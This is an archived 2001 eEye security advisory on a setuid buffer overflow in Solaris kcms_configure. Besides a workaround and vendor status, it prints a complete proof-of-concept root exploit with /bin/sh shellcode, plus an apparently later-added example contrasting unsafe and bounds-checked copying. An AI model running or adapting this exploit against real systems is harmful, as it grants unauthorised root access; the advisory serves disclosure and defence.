Solaris kcms_configure vulnerability

2001-04-10T00:00:00
ID SECURITYVULNS:DOC:1486
Type securityvulns
Reporter Securityvulns
Modified 2001-04-10T00:00:00

Description

Solaris kcms_configure vulnerability

Discovered and exploited by: Riley Hassell riley@eeye.com

Release Date: April 9, 2001

Systems Affected: Solaris 7/8 (x86 and SPARC). Earlier versions are also most likely affected.

Description: It was another long day at eEye where the beer was once again cold but eEye Wudan member Riley decided it was time to do some Solaris spring cleaning. This is the first of several advisories to be released on various Solaris bugs that were lying around needing to be cleaned out.

We have discovered a buffer overflow in the kcms_configure utility provided with Solaris 7. The problem exists in the parsing of command line options: an over-long option value is copied into a fixed-size buffer without a bounds check. Because kcms_configure is installed setuid root, exploiting this vulnerability gives a local attacker root privileges. The Kodak Color Management System (KCMS) packages have contained many vulnerabilities in the past; we recommend disabling them if you are not currently using them.
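The following is an added illustration of the bug class described above, not code from eEye or from Sun; the buffer size, function names and the 1100-byte test argument are assumptions (the length mirrors the BUFLEN used by the proof of concept below). It places the unchecked copy pattern beside the bounds-checked form a setuid program should use: refuse any argument that does not fit, copy with an explicit length, and always terminate.

```c
/* Added example, not part of the eEye advisory.
 * Shows an option value copied into a fixed-size buffer (the defect class
 * in kcms_configure) and a bounds-checked replacement. */
#include <stdio.h>
#include <string.h>

#define OPTBUF 64   /* assumed size of the option buffer */

/* Unsafe pattern: strcpy() trusts the length of an attacker-supplied argv
 * string. It is only ever called with short input in this example; an
 * over-long argument would write past optbuf on the stack. */
int parse_option_unsafe(const char *arg)
{
    char optbuf[OPTBUF];
    strcpy(optbuf, arg);                 /* no bound: the defect */
    return (int)strlen(optbuf);
}

/* Hardened form: measure first, reject anything that cannot fit together
 * with its terminator, then copy exactly that many bytes.
 * Returns the accepted length, or -1 when the argument is rejected. */
int parse_option_safe(const char *arg)
{
    char optbuf[OPTBUF];
    size_t n = strlen(arg);

    if (n >= sizeof optbuf)              /* leave room for the NUL */
        return -1;
    memcpy(optbuf, arg, n + 1);          /* bounded copy, terminated */
    return (int)n;
}

/* Constructed input: a 1099-byte run of 'A', the size class the advisory's
 * proof of concept passes on the command line. Expected result: -1. */
int reject_long_demo(void)
{
    static char big[1100];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    return parse_option_safe(big);
}

int main(int argc, char *argv[])
{
    int i;

    /* Run the hardened parser over every argument and report the verdict. */
    for (i = 1; i < argc; i++) {
        int r = parse_option_safe(argv[i]);
        if (r < 0)
            printf("argument %d: rejected (%zu bytes, limit %d)\n",
                   i, strlen(argv[i]), OPTBUF - 1);
        else
            printf("argument %d: accepted (%d bytes)\n", i, r);
    }
    printf("1099-byte argument -> %d\n", reject_long_demo());
    return 0;
}
```

The same check belongs at every point where a setuid program copies argv, environment or file data into fixed storage; the length test is cheap and turns the overflow into a clean error exit.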

Proof of Concept:

/* Command line argument overflow /usr/openwin/bin/kcms_configure
   Proof of Concept Exploitation Riley Hassell */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFLEN 1100

/* seteuid/exec shellcode */
char shell[] =
    "\xeb\x0a\x9a\x01\x02\x03\x5c\x07\x04\xc3\xeb\x05\xe8\xf9\xff\xff\xff"
    "\x5e\x29\xc0\x88\x46\xf7\x89\x46\xf2\x50\xb0\x8d\xe8\xe0\xff\xff\xff"
    "\x29\xc0\x50\xb0\x17\xe8\xd6\xff\xff\xff\xeb\x1f\x5e\x8d\x1e\x89\x5e"
    "\x0b\x29\xc0\x88\x46\x19\x89\x46\x14\x89\x46\x0f\x89\x46\x07\xb0"
    "\x3b\x8d\x4e\x0b\x51\x51\x53\x50\xeb\x18\xe8\xdc\xff\xff\xff\x2f\x62"
    "\x69\x6e\x2f\x73\x68\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03"
    "\x03\x9a\x04\x04\x04\x04\x07\x04";

char buf[BUFLEN];
unsigned long int nop, esp;
long int offset = 0;

/* x86 only: returns the current stack pointer in %eax */
unsigned long int get_esp() { asm("movl %esp,%eax"); }

int main(int argc, char *argv[])
{
    int i;

    if (argc > 1)
        offset = strtol(argv[1], NULL, 0);
    else
        offset = -300;

    nop = 600;
    esp = get_esp();

    memset(buf, 0x90, BUFLEN);
    memcpy(buf + 600, shell, strlen(shell));
    for (i = nop + strlen(shell) + 1; i <= BUFLEN - 4; i += 4)
        *((int *) &buf[i]) = esp + offset;
    buf[BUFLEN - 1] = '\0';

    execl("/usr/openwin/bin/kcms_configure", "eEye", "-o", "-S", "X", buf, NULL);
    return 0;
}

Vendor Status: Sun Microsystems has been contacted. They are currently working on patches for this and other related vulnerabilities eEye has discovered. We would like to thank them for working with us on creating a patch for this vulnerability.

Workaround: chmod -s /usr/openwin/bin/kcms_configure. This will remove the setuid bit from kcms_configure, therefore if someone does exploit this vulnerability, they won't gain higher privileges.

Greetings: ADM, Ryan “shellcode ninja” Permeh, KAM, Lamagra, Zen-Parse, Loki, and last but not least… all the kick ass people at Speakeasy.net.

Copyright (c) 1998-2001 eEye Digital Security. Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please e-mail alert@eEye.com for permission.

Disclaimer: The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

Feedback: Please send suggestions, updates, and comments to:

eEye Digital Security http://www.eEye.com info@eEye.com